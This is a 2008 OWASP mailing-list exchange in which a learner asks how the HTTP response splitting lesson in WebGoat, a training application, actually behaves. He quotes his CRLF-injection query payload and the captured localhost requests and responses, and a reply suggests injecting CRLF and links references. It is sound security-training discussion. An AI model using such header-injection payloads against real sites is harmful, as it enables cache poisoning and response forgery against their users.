[Owasp-cincinnati] WebGoat HTTP Splitting Attack Question

Marco Morana marco.m.morana at gmail.com
Fri Jul 18 13:36:51 EDT 2008


Yan

I am not familiar with this lesson but I would think to split the
response you would need to inject the CRLF sequence

Did you try that?

I added further resources to conduct the attack herein (*) hope it helps

Regards

Marco

(*)
http://www.webappsec.org/projects/threat/classes/http_response_splitting.shtml
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
http://www.owasp.org/index.php/HTTP_Response_Splitting


On Fri, Jul 18, 2008 at 9:46 AM, Zhou, Yan <yzhou at medplus.com> wrote:
> HI there,
>
>
>
> Although I successfully completed HTTP Splitting Attack in WebGoat 5.2, I
> did not understand a step-by-step behavior of the attack.  I am using
> WebScarab to capture all request & response to give me a better idea.
>
> For example, what does the browser do with the 2nd "made-up" response? Here
> is what I did for testing.
>
>
>
> First, I put in the query parameter exactly as is given in the hint:
>
> language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
> ………
>
>
>
> This is the response I got from server below:
>
>
>
> HTTP/1.1 302 Moved Temporarily
>
> Server: Apache-Coyote/1.1
>
> Location:
> http://localhost/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&language=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Wed,%2016%20Jul%202018%2012:55:46%20GMT%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert
> undesireable content here</html>
>
> Content-Type: text/html;charset=ISO-8859-1
>
> Content-length: 0
>
> Date: Wed, 16 Jul 2008 13:47:47 GMT
>
>
>
> Notice that the response does not appear to be split, the 2nd injected
> response is still part of the query parameter as shown in "location" header.
> Is this a display issue or am I missing something?
>
>
>
> The browser then generates the next GET request, everything I injected is
> now part of GET parameter (if the response is split, I would not see the
> injected content being part of the query parameter, right?)
>
>
>
> GET
> http://localhost:80/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&language=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%2...........
>
>
>
> Then, the response from server, the server should respond with the above GET
> request, right? But here is what I see, notice that is DIFFERENT from what I
> injected because of the additional headers.
>
>
>
> HTTP/1.1 200 OK
>
> Server: Apache-Coyote/1.1
>
> Pragma: No-cache
>
> Cache-Control: no-cache
>
> Expires: Wed, 31 Dec 1969 19:00:00 EST
>
> Content-Type: text/html
>
> X-Transfer-Encoding: chunked
>
> Date: Fri, 18 Jul 2008 13:28:52 GMT
>
> Content-length: 45
>
>
>
> <html>Insert undesireable content here</html>
>
>
>
> My questions are:
>
> 1. I would hope to see two responses being split in the middle like this. I
> do not know if this is just a matter of displaying (since the attack was
> successful)
>
>
>
>         HTTP/1.1 200 OK
>
>         ...
>
>         Set-Cookie: author=Wiley Hacker
>
>
>
>         HTTP/1.1 200 OK
>
>         ...
>
>
>
> 2. why is not there a response to the 2nd GET request, but a similar
> response to my injected text?
>
>
>
> Thanks,
>
> Yan Zhou
>
>
>
>
> Confidentiality Notice: The information contained in this electronic
> transmission is confidential and may be legally privileged. It is intended
> only for the addressee(s) named above. If you are not an intended recipient,
> be aware that any disclosure, copying, distribution or use of the
> information contained in this transmission is prohibited and may be
> unlawful. If you have received this transmission in error, please notify us
> by telephone (513) 229-5500 or by email (postmaster at MedPlus.com). After
> replying, please erase it from your computer system.
>
> _______________________________________________
> Owasp-cincinnati mailing list
> Owasp-cincinnati at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-cincinnati
>
>


More information about the Owasp-cincinnati mailing list